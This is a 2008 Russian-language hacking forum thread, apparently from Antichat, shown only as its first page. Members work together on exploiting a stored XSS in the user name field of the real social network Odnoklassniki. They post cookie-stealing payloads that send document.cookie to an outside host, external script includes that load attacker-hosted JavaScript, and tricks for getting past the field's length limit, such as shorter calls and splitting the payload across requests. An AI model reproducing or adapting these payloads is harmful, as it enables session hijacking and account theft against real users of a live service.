Итак наверно всем известно что на одноклассниках есть xss

Discussion in 'Уязвимости' started by andrey_a87, 14 Apr 2008.

Page 1 of 2
  1. andrey_a87

    andrey_a87 Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    108
    Likes Received:
    1
    Reputations:
    -1
    но вот что делать если не помещается мой скрипт в отведенное мне поле?
     
    #1 andrey_a87, 14 Apr 2008
  2. ~Real F@ck!~

    ~Real F@ck!~ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    283
    Likes Received:
    170
    Reputations:
    -8
    мы экстрасенсы ? хсс в студию
     
    #2 ~Real F@ck!~, 14 Apr 2008
  3. andrey_a87

    andrey_a87 Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    108
    Likes Received:
    1
    Reputations:
    -1
    <script>document.location='http://s.netsec.ru/andreya87.gif'+document.cookie</script>
     
    #3 andrey_a87, 14 Apr 2008
  4. ~Real F@ck!~

    ~Real F@ck!~ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    283
    Likes Received:
    170
    Reputations:
    -8
    это как я понял твой скрипт, попробуй сделать переадресацию с другого сайта, что бы использовалось меньше символов в урл.
     
    #4 ~Real F@ck!~, 14 Apr 2008
  5. andrey_a87

    andrey_a87 Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    108
    Likes Received:
    1
    Reputations:
    -1
    например? всё равно не уместится...
     
    #5 andrey_a87, 14 Apr 2008
  6. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    А сколько символов ограничение? Вместо "document.location=", можно navigate('') попробовать. Короче получится.
     
    #6 Qwazar, 14 Apr 2008
    1 person likes this.
  7. andrey_a87

    andrey_a87 Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    108
    Likes Received:
    1
    Reputations:
    -1
    умещается только <script>document.location='http://s.netsec.ru/andr
     
    #7 andrey_a87, 14 Apr 2008
  8. andrey_a87

    andrey_a87 Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    108
    Likes Received:
    1
    Reputations:
    -1
    <script>navigate('http://s.netsec.ru/andreya87.gif и усё :cool:
     
    #8 andrey_a87, 14 Apr 2008
  9. ~Real F@ck!~

    ~Real F@ck!~ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    283
    Likes Received:
    170
    Reputations:
    -8
    как то можно обойти это ограничение, только я зобыл как, нужно кеша спросить
     
    #9 ~Real F@ck!~, 14 Apr 2008
  10. andrey_a87

    andrey_a87 Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    108
    Likes Received:
    1
    Reputations:
    -1
    мммм жаль....
     
    #10 andrey_a87, 14 Apr 2008
  11. GrAmOzEkA

    GrAmOzEkA Elder - Старейшина

    Joined:
    25 Jun 2006
    Messages:
    234
    Likes Received:
    76
    Reputations:
    29
    Зарегь себе хост где нибуть и создай там *.js
    document.location='http://s.netsec.ru/andreya87.gif'+document.cookie';
    потом создай index.html с содержанием:
    <script src="http://твой сайт/*.js"></script>
    должно прокатить
     
    #11 GrAmOzEkA, 14 Apr 2008
    Last edited: 14 Apr 2008
  12. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    А разбить на несколько запросов никак? Типа

    Code:
    <script>i="2"+document.cookie;/*
ТУТ ВСЯКАЯ ЛАБУДЕНЬ
*/alert(i);</script>
    Ну, т.е. первым запросом шлёшь
    Code:
    <script>i="2"+document.cookie;/*
    вторым

    Code:
    */alert(i);</script>
     
    #12 Qwazar, 14 Apr 2008
  13. Basurman

    Basurman Elder - Старейшина

    Joined:
    10 Nov 2006
    Messages:
    363
    Likes Received:
    271
    Reputations:
    29
    <script src="http://megahackscript.ru/ploent.js"></script>
     
    #13 Basurman, 14 Apr 2008
  14. andrey_a87

    andrey_a87 Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    108
    Likes Received:
    1
    Reputations:
    -1
    А можешь плиз у него спросить?
     
    #14 andrey_a87, 14 Apr 2008
  15. Pir4tt

    Pir4tt Elder - Старейшина

    Joined:
    3 Jan 2008
    Messages:
    73
    Likes Received:
    36
    Reputations:
    5
    а сохранить страничку и ручками исправить ограничение поля на количество символов не прокатит?)) чё за хсс-то там..
     
    #15 Pir4tt, 14 Apr 2008
    Last edited: 14 Apr 2008
    1 person likes this.
  16. andrey_a87

    andrey_a87 Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    108
    Likes Received:
    1
    Reputations:
    -1
    xss на имени весит...измените имя и поробуйте написать у себя на форуме...
     
    #16 andrey_a87, 14 Apr 2008
  17. andrey_a87

    andrey_a87 Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    108
    Likes Received:
    1
    Reputations:
    -1
    способ gramozeki не прокатывает,а способ на разбиение я считаю не уместным....может я не прав...
     
    #17 andrey_a87, 14 Apr 2008
  18. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    andrey_a87, ну ты попробуй :) А вообще то, что Basurman написал должно прокатить.
     
    #18 Qwazar, 14 Apr 2008
    Last edited: 14 Apr 2008
  19. miniden

    miniden Elder - Старейшина

    Joined:
    20 Oct 2006
    Messages:
    258
    Likes Received:
    34
    Reputations:
    6
    я делал фреймом , подсойденял скирипт, но всеравно, даже если оно и вместиться, то потом на форуме имя всеравно обрежут, тоесть для алерта места хватает, а для норм скрипта нет...
     
    #19 miniden, 14 Apr 2008
  20. Игорь Михайлович

    Игорь Михайлович Banned

    Joined:
    14 Apr 2008
    Messages:
    1
    Likes Received:
    1
    Reputations:
    0
    создай на сайте дж скрипт и скр его.
     
    #20 Игорь Михайлович, 14 Apr 2008
(You must log in or sign up to post here.)
Page 1 of 2
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.